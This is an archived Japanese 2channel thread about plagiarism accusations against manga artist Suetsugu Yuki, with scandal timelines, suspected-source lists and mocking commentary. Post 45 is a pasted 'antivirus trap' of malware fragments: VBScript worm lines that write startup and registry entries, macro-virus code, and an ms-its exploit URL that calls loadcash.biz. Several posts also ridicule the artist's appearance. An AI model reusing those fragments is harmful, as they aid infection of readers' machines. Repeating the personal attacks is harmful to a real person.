5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【復活は】末次由紀Part58【女性誌?】

1 :花と名無しさん:2006/12/31(日) 08:07:38 ID:JmdTuLNL0
初めて来たひとはとりあえず検証サイトを見てください

▼検証サイト
http://cabin.jp/k55yuki/

・煽りに餌を与えてはいけません。華麗にスルーしましょう。
・パクリらしきものを見つけたらなるべく詳細を添えて発言しましょう
・次スレタイ案は前スレ>900以降あたりから
・その中から、>950とった人間が適当に選んで決める
・規制くらってスレ立てられそうにない人、自信のない初心者は >900過ぎたあたりから書き込み自主規制よろ

【もうすぐ一周年】末次由紀Part57【潜伏中】
http://comic7.2ch.net/test/read.cgi/gcomic/1158237052/
その他>>2-20あたりにあるかも。

2 :花と名無しさん:2006/12/31(日) 08:08:25 ID:???0
▼検証スレ
末次由紀盗作検証スレPart4 (dat落ち)
http://comic6.2ch.net/test/read.cgi/csaloon/1134148828/
避難所
http://jbbs.livedoor.jp/comic/2862/

▼ヲチスレ (dat落ち)
http://ex9.2ch.net/test/read.cgi/net/1129920518/

▼謝罪文(検証サイトに転載されています)
講談社 ttp://www.kodansha.co.jp/info.html (※削除済)
別フレ ttp://www.kodansha.co.jp/betsufure/

▼過去スレ
http://makimo.to/cgi-bin/search/search.cgi?D=gcomic&q=%96%96%8E%9F&sf=2&andor=AND
http://makimo.to/cgi-bin/search/search.cgi?D=gcomic&q=%95%CA%83t%83%8C&sf=2&andor=AND
http://2ch.dumper.jp/0000971271/←電車男祭り

3 :花と名無しさん:2006/12/31(日) 08:09:14 ID:???0
▼経緯
2ちゃんねるでスラムダンクやバスタードからのトレスが発覚
↓ 検証ブログつくった
↓ 公式掲示板荒れる
↓ 末次由紀氏公式掲示板で心無い謝罪
↓ 公式掲示板荒れる
↓ 検証サイトも作ったお( ^ω^)
↓ 荒れる公式掲示板へファン(HN.misaki)からの応援書き込み
↓ IPアドレス 末次由紀氏=misaki  m9(^Д^)プギャー
↓ 自作自演?で祭り
↓ 「misaki」応援書き込み削除される
↓ 「末次由紀」氏、もう一度掲示板で釈明
↓ 公式サイト謎のコメントを残してあぼん
↓ 謎のコメントちょっぴり修正
↓ 末次氏の盗用を講談社が謝罪、雑誌連載中止・全単行本絶版・出荷停止
↓ テレビ・新聞・インターネットで報道される
↓ 別フレトップにSilver盗作発覚&休載のおしらせ
↓ 公立大卒を国立大卒と学歴詐称発覚
↓ 週刊誌にも記事になる
↓ ラジオで爆笑問題に斬られる
↓ グラビア・いくえみ等続々パクトレ発覚 
↓ナディアですかエヴァですか疑惑
↓和田尚子からまるっとネタパク発覚
↓2006年5月 日経エンタにて 竹熊氏の寄稿でまた記事になる。
↓2007年に女性誌で復活?情報

4 :花と名無しさん:2006/12/31(日) 08:10:08 ID:???0
▼検証途中その1(疑惑、うp待ちなど)

【末】100%の君への柴【逢坂みえこ】「永遠の野原」のみかん?
【末】http://www3.ezbbs.net/06/tretreyuki/img/1130003509_1.jpgの右下
【惣領冬実】ttp://img.sheezyart.com/image/32/326004.jpg(全体図求む)
【末】羽根シリーズ(白い羽根?) 【折原みと】天使と悪魔系の話(ストーリー・設定パク?同氏の画集からのパクリ疑惑も有)
【末】「エデンの花」主人公の父の焼死シーン(うp求む)元ネタありだろうとの指摘アリ 【久保ミツロウ?】337ビョーシ?(うp済)(詳細)
【末】「エデンの花」の後半の絵。ビルに兄貴が助けに来たシーン 【久保ミツロウ】337ビョーシに似てる。団長に似てる。
【末】読み切り 【ジョージ朝倉】「イカルスの恋人たち」(「恋文日和」に収録)そのまんまらしい。
【末】「エデンの花」 【ジョージ朝倉】「恋文日和」(男の子が女の子に君が花なんだみたいなセリフを言うところとか)
【末】「エデンの花」エレベーターのシーン 【宮川匡代】「林檎と蜂蜜」エレベーターのシーン
【末】「100%の君へ」母親の車椅子描写

5 :花と名無しさん:2006/12/31(日) 08:11:10 ID:???0
▼検証途中その1(疑惑、うp待ちなど)

【末】100%の君への柴【逢坂みえこ】「永遠の野原」のみかん?
【末】http://www3.ezbbs.net/06/tretreyuki/img/1130003509_1.jpgの右下
【惣領冬実】ttp://img.sheezyart.com/image/32/326004.jpg(全体図求む)
【末】羽根シリーズ(白い羽根?) 【折原みと】天使と悪魔系の話(ストーリー・設定パク?同氏の画集からのパクリ疑惑も有)
【末】「エデンの花」主人公の父の焼死シーン(うp求む)元ネタありだろうとの指摘アリ 【久保ミツロウ?】337ビョーシ?(うp済)(詳細)
【末】「エデンの花」の後半の絵。ビルに兄貴が助けに来たシーン 【久保ミツロウ】337ビョーシに似てる。団長に似てる。
【末】読み切り 【ジョージ朝倉】「イカルスの恋人たち」(「恋文日和」に収録)そのまんまらしい。
【末】「エデンの花」 【ジョージ朝倉】「恋文日和」(男の子が女の子に君が花なんだみたいなセリフを言うところとか)
【末】「エデンの花」エレベーターのシーン 【宮川匡代】「林檎と蜂蜜」エレベーターのシーン
【末】「100%の君へ」母親の車椅子描写

6 :花と名無しさん:2006/12/31(日) 08:12:07 ID:???0
▼検証途中その2(疑惑、うp待ちなど)

【末】「君の黒い羽根」エイズの話【映画】「フォー・エヴァー・ライフ」
【末】卓球シーン(うp済) 【?】有力な卓球シーン情報待ち
【末】「幸福の星」(「君の白い羽根II」に収録)【和田尚子】「世界が輝く理由」(「片道切符」6巻)
【末】「カーネーション」(「君の白い羽根DX」収録)
【小津安次郎吾】「東京物語」【大島弓子】「秋日子かく語りき」
【東野圭吾】「秘密」【ジョージ朝倉】「イカルスの恋人たち」(「恋文日和」に収録)
【末】「Only You」こころの目ドナー話【手塚治虫】ブラックジャック第2話「春一番」(インスパイヤ?)
【末】?【?】なかよしの投稿者向け小冊子「るん」に掲載された作品
【末】羽根シリーズ(台詞パク疑惑)【高河ゆん】「夜嬢帝国」「妖精事件」
【末】? (台詞パク疑惑)【ジョージ朝倉】「少年少女ロマンス」
【末】? (台詞パク疑惑)成田美名子「サイファ」から台詞パクリ・構図トレース。
【末】? (台詞・構図パク疑惑)【ひうらさとる】?
【末】「Only You」 (台詞パク疑惑)【惣領冬実】「MARS」
【末】「エデンの花」 (設定パク?)【惣領冬実】「MARS」
【末】10月発売別フレ掲載の読みきり(台詞パク疑惑)【きら】「まっすぐにいこう」(+【永田正実】「恋愛カタログ」)

7 :花と名無しさん:2006/12/31(日) 08:15:03 ID:???0
▼テンテーの日記などに名前が挙がった作品 (2)

「私立T女子学園(竹田エリ)」 「ピアニッシモにささやいて(石塚夢見)」
「ぽっかぽか(深見じゅん)」 「サラディナーサ(河惣益美)」
「発情装置(上野千鶴子)」 「パタリロ!(魔夜峰央)」
「どすこい(京極夏彦)」 「塗仏の宴 - 宴の始末(京極夏彦)」
「模倣犯(宮部みゆき)」 「天使禁猟区(由貴香織里)」
「ONE PIECE(尾田栄一郎)」
「カバチタレ!(田島隆/東風孝広)」
「ナニワ金融道(青木雄二)」
「ハリー・ポッター(J.K. ローリング)」
「ハリウッド脚本術(ニール・D. ヒックス)」
「池袋ウエストゲートパーク(石田衣良)」 「波のうえの魔術師(石田衣良)」
「あずまんが大王(あずまきよひこ)」 「ずっと彼女がいないあなたへ(諸富祥彦)」
「ループ(鈴木光司)」 「ほめるな(伊藤進)」
「美味しんぼ(雁屋哲/花咲アキラ)」 「吼えろペン(島本和彦)」
「ジョージィ!(井沢満/いがらしゆみこ)」 「Made in ニッポン(秋里和国)」

8 :花と名無しさん:2006/12/31(日) 08:16:17 ID:???0
▼自作自演発覚? misakiタンの文章

テンテー謝罪後、ファン(misaki)装って自演擁護の書き込み

★投稿者:misaki ★投稿日:2005/10/16(Sun) 05:06 No.51487
謝罪に対して「あれがたりない・これがたりない」と言っても誰だって
対応しきれないですよ。
説明を求めて、たとえ説明してもらっても、結局私たちは言い訳とかに
感じるんだろうし。
わたしはいろんな検証を見て、そのあと作品を読んでも、
変わらず末次先生の漫画が好きです。正直な気持ちでそう思ったんだから
否定しないでもらいたいけど、絵が似てることなんてたいした問題じゃな
いように感じました。マネだけで漫画なんかかけないです。
もちろん「大した問題」なんだろうけど、末次先生の漫画の雰囲気がどの
単行本にも流れていて、そこがきっと好きな理由なので、そう思った気持ち
を素直に書きます。当事者が訴えてもいないのに、責任問題・・・?今後につ
いて・・・?そんなこと詰問する権利も無いのに代わりに裁こうとしてるみた
いでどうしても疑問です。

たしかに、こういう状況だと「漫画家やめたほうが楽」
ってなりますよ。でもふんばって書きつづけてください;;
新しい作品を楽しみにしています。


※IPにてmisaki=末次本人だと判明※

9 :花と名無しさん:2006/12/31(日) 08:18:30 ID:???0
てんてーブログ
http://www.google.com/search?num=50&lr=lang_ja&q=%E3%81%B0%E3%82%8A%E3%81%B9%E3%82%8A%E3%81%8A%E3%81%97%E3%82%83%E3%81%B9%E3%82%8A

キャッシュというところをご覧ください。痛さ爆発↑


釈明文
http://cabin.jp/k55yuki/syakumei.html
> やってしまったことの重大さに心はどんどん重くなり、その夏には
>「こんな自分が漫画家として描いていっていいわけがない」と、
>漫画を描くのをやめたい・やめよう、と思って担当さんに相談したりもしていました。

ちなみに、そのスラダンパクマンガの後に描いた作品

・100%の君へ 全2巻
・君の白い羽根.天使の声 100P
・最速の夏(読みきり) 85P
・君の白い羽根.最上階のエンゼル 100P
・ Silver 1〜2巻
あと、他にも読みきり有り

10 :花と名無しさん:2006/12/31(日) 08:19:46 ID:???0
末次スレ用語集・1】

【末次由紀】
漫画の錬金術師。
上田美和作品、スラムダンク、リベロ革命、アイドル写真集、グラビアを素材にして、
パッチワーク漫画を10年以上も量産し続けた、盗用の魔術師。

【misaki】
末次由紀の魂の双子。信者の擁護が頼りにならないときに出現する。
盗用を「たいした問題じゃない」と捉らえている。

【テンテー】
末次とmisakiが同IPだと指摘した神が命名した、末次由紀の新しい呼称。
末次先生と呼びたくない少女漫画読者に愛用されている。   

【副編集長T】  
愛称・利ちゃん。ダチョウ倶楽部、ドリカム似の男性編集者。40代?
デビュー以来の末次担当。上田美和担当でもある。入社以来別フレ所属。

【アシブラ】
アシスタントブラザーズの略。
末次大学生時代、無償でアシスタントをしていた男子学生達。
cf.誠君

11 :花と名無しさん:2006/12/31(日) 08:21:04 ID:???0
2005/11/08 初の写真集パク見つかる。大石恵から芋づる。これ以降写真集パクがざっくざく。
2005/11/09 上田パク発見。その後さらに発見。 リベロも発見。
2005/11/11 松本恵からもパクリ発覚。やはり芋づる。
       安倍麻美からもパクリ発覚。やはり芋づる。「そのまま。」
2005/11/12 写真集検証ヒートアップ ヤフ辞書にエデンがwww
       ttp://dic.yahoo.co.jp/tribute/2005/11/11/2.html
2005/11/13 あなたのダイナマイトがサンフランシスコから到着。上田パクざっくざく。
2005/11/14 広末からもキター。犬耳できた。やはり芋づる。
2005/11/15 容量オーバーのため画像庫移転 tp://blog.goo.ne.jp/torepaku/
2005/11/16 上戸彩キタ?この前後の写真キボンヌ
2005/11/17 今度は はいせんす絵本
       大石恵トレスをまたトレス
       またリベロ
2005/11/18 上田背景トレスをまたトレス
2005/11/19 また はいせんす絵本
       とうとう例のあさぎりパクキタコレ
2005/12/01 misakiが美咲をトレスキタ─wwヘ√レv〜(゚∀゚)─wwヘ√レv〜─ !!
2005/12/27 上田美和イラスト集「トレゾア」からのトレス発覚

12 :花と名無しさん:2006/12/31(日) 08:25:03 ID:???0
2006年になってからも、
ひとつ黒物件の追求のレスがあがれば
それを阻止しようとテンテー工作員必死のスレ流し中。

でもまだまだざくざく出てきます。
2006/01/06
エヴァ?ナディア?
ttp://blogimg.goo.ne.jp/user_image/43/a2/edf84ebe606170d9eae2d6a2b2e85cdd.jpg

2006/01/07
キャナルシティの版権あり写真を使ってるのでは疑惑

2006/01/09
キスシーンやっぱり上田氏からの黒でした

2006/01/02
検証サイトがヤフーに登録されました。←スレタイここから
トップ > 政治 > 法 > 知的財産権 > 著作権 > 盗作問題

2006/01/20
和田さんからのネタパク、比較キタコレ

13 :花と名無しさん:2006/12/31(日) 08:26:29 ID:???0
テンテー検証のガイドライン

テンテーのマンガは

1)顔のアップ(つり目気味、又は寄り目気味)
2)おかしな体型の絵(頭が大きい、又は手足が短い)
3)ちゃんとした体型の絵(大ゴマ、決めゴマ、扉、表紙に多い)

で構成されています。
読んでいると自然と3が浮き出てきます。検証の始まりです。

パク先は漫画、写真集、雑誌等、多岐にわたります。
キーワードは「反転」と「そのまま。」です。
パクる時はポーズはもちろん服装や筋肉の付き方、
時には背景までそのままパクります。
変な小細工はテンテーの主義に反します。

<パク先がありそうな例>
・少女漫画にしては下半身が太くなっている
(実在の人物からパクっている可能性があります)
・話の流れの中で人物の動きに一貫性がない
(途中のどこかをパクって描いている可能性があります)
・扉絵やイラストで、作中の人物の設定や性格を無視した表情や服装をしている
・凝った構図、スポーツシーンなどで特殊で難しいポーズをしている
・同一人物なのに表情がそのコマだけ別人のようである

14 :花と名無しさん:2006/12/31(日) 08:27:33 ID:???0
似てるという指摘はあるものの具体的な検証に至っていない作者・作品

・花より男子(エデン・君の白い羽根-カーネーション-)
・猫山宮緒(エデン)
・藤村真理(オンリーユー)
・高口里純(近年の男性キャラ)
・樹なつみ(男性キャラ)
・浦沢直樹(Silver・君の白い羽根-天使の声-)
・清水玲子
・惣領冬実(オンリーユー・エデン)
・折原みと、あさぎり夕(初期作)
・高河ゆん(羽根シリーズ)
・河下水希りりむキッス(羽根シリーズ)
・のだめ(Silver)
・宮坂香帆(微熱少女)とエデン
・永遠の野原・まっすぐにいこう(100%の君へ)
・藤村真理(Only you)
・渡辺多恵子(エデン)

15 :花と名無しさん:2006/12/31(日) 10:56:48 ID:???O
私は、先生の羽シリーズには本当に感動して泣かせていただきました。「最後の恋人」「天国のKISS」は好きな作品でした。
エデンやSilverは読んでないので検証のしようがなぃのですが、すべてばパクリでなぃこと、初期の読み切りにあった純粋さが嘘でなかったこと、を祈ります。

16 :花と名無しさん:2006/12/31(日) 13:58:01 ID:???O
この方美人って本当ですか?

17 :花と名無しさん:2006/12/31(日) 16:04:07 ID:???0
どっちかっつうと可愛い系かな。


ブタ鼻隠せば

18 :花と名無しさん:2006/12/31(日) 16:54:01 ID:???O
お返事ありがとうございます。

うう〜ん・・・?微妙ってこと?
目と口だけ可愛いの?

19 :花と名無しさん:2006/12/31(日) 17:01:26 ID:???0
マジ質問だったのか…
ブログにどアップ写真載せてたくらいだから自信はあったんだろね
目は大きくないが、ブタっ鼻を巧みに手でかくしたアングルで
中の上くらいかなと思った

20 :花と名無しさん:2006/12/31(日) 18:46:29 ID:???0
>>15が見事にスルーされてる件について

21 :花と名無しさん:2006/12/31(日) 20:47:46 ID:???0
>>20
みんな忙しいからw

22 :花と名無しさん:2006/12/31(日) 21:54:06 ID:???0
>>21
君は大晦日に何を(ry

23 :花と名無しさん:2006/12/31(日) 22:01:43 ID:???O
あ、ごめんなさい>>16です。だってぇこんな自己陶酔(>>15)に何を言えばいいのよう。
普段漫画はあまり読まないで、活字ばかりなんですけど、『パクリの歴史』みたいな特集でこの方の事がひととおり書いてたんですよ。美形って紹介で。
前スレから覗いてたんですが、容姿については誰も書いてなかったんで、ついつい...

24 :花と名無しさん:2006/12/31(日) 22:02:50 ID:???0
蕎麦食って酒飲んでK-1見ながらネットしてる



テンテー来年もよろ

25 :花と名無しさん:2007/01/01(月) 04:38:57 ID:???O
>>1
ケイタイからスマソ
前スレの最後、以前もあったけど
あれって何なの??

26 :花と名無しさん:2007/01/01(月) 12:42:24 ID:???O
末次検証に役立つサイト
http://www10.big.or.jp/~hamm/idledir/magazine/index.html

雑誌のグラビア掲載タレントが調べられる

27 :花と名無しさん:2007/01/01(月) 17:32:15 ID:???O
>>16
かなり美人
ほとんどノーメイクなのに目クリクリだし、色白で清楚な感じだよ

28 : 【中吉】 【1192円】 :2007/01/01(月) 17:33:40 ID:???O
テンテー、正月からお疲れ様です

29 :花と名無しさん:2007/01/01(月) 22:04:05 ID:???0
誉めたり擁護したりしてる人って携帯限定なんだね、笑える。
本当にご当人か、とかつい思っちゃうよ。

30 :花と名無しさん:2007/01/01(月) 22:20:01 ID:QtOTi1UT0
ほとんどノーメイクだなんて写真みる限りじゃわからんのにね。
・・・末次さん見苦しいですよ相変わらず。

31 :担当編集:2007/01/02(火) 04:58:39 ID:???0
>>27
テンテー!年明け早々なにやってるんですか!
擁護書き込みで自爆してる暇があったら原稿描いてください!
復帰したくないんですか?


32 :花と名無しさん:2007/01/02(火) 05:16:50 ID:???0
こんな盗人漫画家を使うなんて
講談社って人材いないの?

33 :花と名無しさん:2007/01/02(火) 22:18:51 ID:???0
ここはテンテーとの触れ合いスレになりました

34 :花と名無しさん:2007/01/03(水) 01:04:48 ID:???0
またうさんくさい漫画を描くつもりなのでしょうか。
盗作騒動でうさんくささに磨きがかかっているというのに。

35 :花と名無しさん:2007/01/04(木) 03:07:37 ID:???O
単行本の帯に
「あの人気コミックを盗用した漫画家が帰ってきた!?」と、
堂々と書かれてるなら一冊ぐらい買ってやってもいい。

だが、ペンネーム変えてたり盗用過去を隠滅して復活するつもりなら
一生叩き続ける

36 :花と名無しさん:2007/01/04(木) 08:10:01 ID:???0
会った事あるけど美人つー印象はないけど。
ジミーな人って感じだよ。
何か偉そうにしてた。

37 :花と名無しさん:2007/01/04(木) 14:13:24 ID:y+AjehQz0
美人美人いう人は末次本人か悪徳商法のお仲間か。

38 :花と名無しさん:2007/01/04(木) 14:48:58 ID:???0
テンテー見てたら、冗談抜きで
ただつるんで遊ぶだけじゃなくて本当の友人を作らなきゃと思った

39 :花と名無しさん:2007/01/04(木) 21:05:12 ID:???0
しかし例の万引きの件といい、誉めたり擁護したりする人たち、もしくは
ご本人のバランス感覚がよく判らない。
余計突っ込まれて日に油な事ばかりどうして書き込むのか?

40 :花と名無しさん:2007/01/04(木) 22:43:52 ID:???O
いえ、全然擁護のつもりはないんですけど、純粋に容姿について知りたかっただけで。
前スレでは出なかった容姿に対しての突っ込みが聞けて満足です。

41 :花と名無しさん:2007/01/05(金) 00:36:31 ID:???0
復活なんてあるの?
恥ずかしくて出てこれないと思うんだけど。

42 :花と名無しさん:2007/01/05(金) 02:20:45 ID:???0
>>41
キミはまだテンテーの恐ろしさ、いや厚顔無恥さを知らない。

43 :花と名無しさん:2007/01/05(金) 05:42:57 ID:???0
誰も反応しなければいいんだよ。
熱狂信者さえいなければ、商品価値のない道具に会社も
仕事の場を与えたりはしない。
てかあんな大して知名度のない漫画家でも信者がいるって
日本は本当に漫画大国だね

44 :花と名無しさん:2007/01/05(金) 08:57:16 ID:???0
その熱狂儲ですら絶版回収知って
慌ててコミック買いに走る程度の人達が多かった。
末次に対しての扱いって所詮そんなもの…。
無くなれば欲しくなる程度という事なんでしょうな。

45 :花と名無しさん:2007/01/05(金) 13:56:23 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

46 :花と名無しさん:2007/01/05(金) 18:01:31 ID:???0
テンテー、スキルアップですか?

47 :花と名無しさん:2007/01/05(金) 18:39:15 ID:???0
コード貼れるようになったから?じゃないよねw

48 :花と名無しさん:2007/01/05(金) 19:29:40 ID:???0
>>41
普通はね。普通は・・・。
でも復帰が現実に有り得るんじゃないかと思わせる何かが、っていうかその、
>>42が書いてるような部分がテンテーにはあるようなんだ。

49 :花と名無しさん:2007/01/05(金) 20:22:58 ID:???0
あら久しぶりにノートントラップですか?

50 :花と名無しさん:2007/01/05(金) 22:45:19 ID:???0
テンテー自身なのか、テンテーの取り巻きなのかわからんが
本当に悪質ですなぁ。ノートントラップを貼って喜んでるなんて。
まさかテンテーが回避の方法しらないとかじゃないよね?

51 :花と名無しさん:2007/01/05(金) 22:59:09 ID:???O
別スレでTL誌に復帰とあったんだけど、
何か他に情報ご存知ないでしょうか?

52 :花と名無しさん:2007/01/05(金) 23:00:04 ID:???0
TLwwwwwwうわーーー

53 :花と名無しさん:2007/01/06(土) 00:55:04 ID:???0
>>51
その別スレを教えて下さい。
どういうタレコミ方されてるのか知りたいです。

54 :花と名無しさん:2007/01/06(土) 01:20:59 ID:???0
復刊ドットコムのコメントってすごいね。
「修正すれば問題ない」とか「盗作してても気にならない程、作品として素晴らしい」とか…。
信者じゃなくて儲ってこういう事なのかなと思った。なんか怖いよ。

55 :花と名無しさん:2007/01/06(土) 01:43:35 ID:???0
>>54
なにそれ…。怖いっていうか気持ち悪い。

56 :花と名無しさん:2007/01/06(土) 02:42:16 ID:???O
>53
恋愛天国スレだけど、
話しの流れから違う人のことみたい?
間違ってたらごめんなさいm(__)m

57 :花と名無しさん:2007/01/06(土) 03:14:19 ID:???0
>>56 アリガd
見てきたけど違うかもですね。
>竹書房のティーンズラブ漫画誌・恋愛天国(れんあいパラダイス)

でもあのスレの「狂犬テンテー」というのが激しく気になります( ゚д゚)ポカーン

58 :花と名無しさん:2007/01/06(土) 05:54:58 ID:???0
>>54
彼の国の論理に通じるものを感じる。

59 :花と名無しさん:2007/01/06(土) 09:08:10 ID:???0
ほとんどパクだったんだから修正したら完全に別物やん…
ていうか、ほぼ描き直しになる作業をテンテーがするかね
原稿料も出る訳ないし

60 :花と名無しさん:2007/01/06(土) 19:31:36 ID:???O
この人パクリ無しでなんか描けるの?

61 :花と名無しさん:2007/01/07(日) 02:34:31 ID:???O
恐くて気持ち悪いのはオマエラも同じだよ

62 :花と名無しさん:2007/01/07(日) 07:45:22 ID:???0
>>61
あ、テンテーあけおめw

63 :花と名無しさん:2007/01/07(日) 11:45:08 ID:???O
初めて読んだこの人の漫画がエデンだったんだけど
途中から絵が気持ち悪くなったな

64 :花と名無しさん:2007/01/07(日) 15:26:16 ID:???0
最初から気持ち悪かったよ。
体のバランスおかしかったり物が宙に浮いてたりで
ずっと見てると酔いそうな感じ。

65 :花と名無しさん:2007/01/08(月) 10:10:04 ID:???0
原稿にじっくり時間かけていたら
改善できる事をせずにさっさと遊びに行く人ですからね。
末次の漫画って金儲けの為の手段として描いてるのが
ありありと見えてて嫌なんだよな。
またこんな盗作漫画家が復帰なんて事になったら
他の漫画好きな漫画家に失礼だと思う。

66 :花と名無しさん:2007/01/08(月) 12:34:11 ID:wmdzeMKC0
ここまで叩いたらもういいんじゃないかと思う
この人決して好きじゃないけど。
こういう悪意も分かった上で復帰するなら
それだけ漫画に情熱あるんだろうし

67 :花と名無しさん:2007/01/08(月) 12:47:12 ID:???0
一度謝罪した後もまだトレスしまくり、
原稿早く上げて遊びに行きました♪って
公開日記に書く人の「漫画の情熱」ねえ。
楽して金儲けしたがってるとしか思えない。

68 :花と名無しさん:2007/01/08(月) 13:04:51 ID:r7p2kT4Y0
構図に悩まなくてもいいからと
トレスやパクリして漫画描く人間に
漫画への情熱なんて感じられない。
金になるし「テンテー凄いです!」等の
賞賛が欲しい為の漫画家としての
活動でしか感じられない。
テンテーは金に対する情熱と執着しかないでしょ。

69 :花と名無しさん:2007/01/08(月) 13:22:27 ID:???0
この人は「筆を置く」って自分でも言っていて
なんで筆を置かないの?
ただでさえ嘘だらけの漫画家してたんだから
漫画家としてちゃんと筆を置くべきでしょう。
これって漫画への情熱が無いって事では?

70 :花と名無しさん:2007/01/08(月) 14:00:45 ID:???O
ここにいる人達って末次由紀のファンだった人達なの?

71 :花と名無しさん:2007/01/08(月) 14:34:12 ID:???O
末次由紀のウォッチャーだった人達

過去形 未来形 現在形

72 :花と名無しさん:2007/01/08(月) 15:56:20 ID:???0
好きで読んでた人間ですが、それがどうかしましたか?

73 :花と名無しさん:2007/01/08(月) 16:39:15 ID:DvVegMPzO
>>69
基本的にテンテーは誘い受け体質なのでは?
謙遜した素振りを相手に塗り(押し)付けて、
相手に「そんな事ないよ〜」って言わせておいて「あ、やっぱり〜?」とか
平気で(無意識に?)言えてしまうタイプと言うか。晒されてた自分語りを読むだけでも
自分は小物だと言う割に、読者や関係者に何を言わせたいのかが
プンプン臭い立ってたし。強かで図々しいんでしょ

74 :花と名無しさん:2007/01/08(月) 16:55:57 ID:???O
>>72 いつも同じようなこと書いてあるのに、58まで続くなんてさすがにすごいなと思って。

75 :花と名無しさん:2007/01/08(月) 17:51:00 ID:???0
盗作発覚絶版祭りのときにスレ数が伸びただけで
基本は過疎に近いマターリだよ。

76 :花と名無しさん:2007/01/08(月) 21:39:38 ID:???0
マンガへの情熱はなくても、賞賛への情熱だけなら
人の数倍は強かったように思える。

人様の目に付く所でまんが書いて「先生ですか?」って
言われるのをひたすら待ってたようだし…
サインねだられたり、尊敬される自分への情熱…
向上心が有ればまだマシだったかもねぇ

77 :花と名無しさん:2007/01/08(月) 21:47:14 ID:???O
エクセルの店員からすればたかだかラテ一杯の注文で何時間も粘る上
食べ物持ち込むわ(酢昆布だっけ?)漫画の下書きするわの
単に消しゴムのカスを出すウザイニートヲタ女にしか
見られてなかったと思うんだけど…
そもそもテンテーって盗作で漸く名前が知れ渡ったレベルの知名度だし。

78 :花と名無しさん:2007/01/08(月) 22:23:27 ID:wmdzeMKC0
誰でもけなされるより
賞賛されたいでしょう
 だから何をしてもいいわけじゃないけど

79 :花と名無しさん:2007/01/09(火) 00:14:05 ID:???0
賞賛されるためにけなされるようなことをしたというのは、
なんていうか皮肉だね

80 :花と名無しさん:2007/01/09(火) 00:48:38 ID:???O
>>70
コミックスは買ったこともないが、毎月楽しみに別フレを立ち読みしてたオバ厨でした。
単純に話が面白くて追いかけてたけど、2chではパクリパクリと言われてて不思議だった。
毎月こなしてるページ数が大量だったので、描くのが早い人なんだと思ってた。
事件が発覚したときはパクリパクリと言われていたことには納得したけれど、
未だに叩き続けられる人がいることに感動すら憶えてしまう。
擁護レス入るとソッコー作者認定だし。
多分、パクられた作者のアシか友人、関係者なのかなと想像しながらヲチしてますが。

81 :花と名無しさん:2007/01/09(火) 01:09:08 ID:???0
>>80
そうとは言い切れないと思う(そういう人も混ざってるのかも知れないが)。
少なくとも私はそういう関係者じゃないし、ファンだっただけにがっかり
したって書いてる人も時々いるし。
テンテーはエデンまで知らなかったけど、たまたま1巻を読んだら
おもしろかったので全巻買って(正直3巻以降は惰性になったけどw)、
サイトを覗いてみたらけっこうなんだかなぁみたいな人だったけど
まあ漫画は漫画と思ってた。
漫画自体は単行本を買うほどに好きだったこともあったので
騒動にはびっくりがっかりした。軽蔑のような感情も湧いた。
それ以後もこの板に来れば必ずではないけどスレも見るし、というか
1周年ごろまでめっきり見てなかったんだけど1年経って来てみたら
まだスレがあったのでそれ以降は時々見てる。常に書き込むわけじゃ
ないけど、復帰説が持ち上がればいかがなものかと思うのでそういう
意見は書いてる。
そんな感じの人が多いんじゃないのかなー。のちに(この程度の細々と
した語り草になるくらいには)あの騒動は衝撃的だったと思うよ。
misakiのこともあって。

82 :花と名無しさん:2007/01/09(火) 01:16:01 ID:???0
>>29の気持ちもわからないでもないw

83 :花と名無しさん:2007/01/09(火) 04:10:03 ID:???0
>>80
当時のスレの伸びや全国ニュースにもなった割には過疎ってるって言って
いいくらいだと思うけどw
テンテーの認知度が元々低かったからこんなもんなんだろうけど

84 :花と名無しさん:2007/01/09(火) 08:41:49 ID:???0
携帯で擁護いれるのって
末次本人か悪徳商法のお仲間か取り巻きの人間じゃないの?
他スレでも携帯での末次プッシュが気味悪がられてた。

85 :花と名無しさん:2007/01/09(火) 08:53:00 ID:???0
>>80
パクラー全般を追いかけてる私のような人間もいるかと
他人の努力を簡単にパクって自分が努力したかのように振舞うパクラー最低


86 :sage:2007/01/09(火) 13:47:42 ID:02AQ+oevO
このスレ見てると専門学校時代の同級生を思いだす。そいつもクラスメイトの作品をトレースし、沙羅まひろの漫画を卒業作品集でパクろうとしたときに担任にバレて、別作品を描いたものの、表紙はやはりパクリだった。パクリ癖は一度ついたら治らないと思った…

87 :花と名無しさん:2007/01/09(火) 13:52:34 ID:???0
恥ずかしいっていう気持ちがないのが不思議

88 :花と名無しさん:2007/01/09(火) 14:30:37 ID:CwVUZEOQO
純粋な意味でプロ意識がないんじゃないかな。
(ちゃんと描けて当たり前のプロの漫画家の作品を)キレイに、きっちりと
トレース出来たら「うん、(トレースが)良い出来!今回も私良く出来たな〜」みたいな。
でも精神的な立場ではプロの「つもり」なんだよね。
プロとして頑張る、じゃなくてプロのつもりで頑張る、と言うか。
やっぱ人として単に未熟だったんでしょう。社会経験もなかったみたいだし

89 :花と名無しさん:2007/01/09(火) 14:35:01 ID:???0
マネだけで漫画なんかかけないですとかmisakiさんも言ってたしね。
ちょっと顔を変えた、ちょっと服を変えた、で、もう「自分の相当な
努力」と変換して認識してたのかも。

